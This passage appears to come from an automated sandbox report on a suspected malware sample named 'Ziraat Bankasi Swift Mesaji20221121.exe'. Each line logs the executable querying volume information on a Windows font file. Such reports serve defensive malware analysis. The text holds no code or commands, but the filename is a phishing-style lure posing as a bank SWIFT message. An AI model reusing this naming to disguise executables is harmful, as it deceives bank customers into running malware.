      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
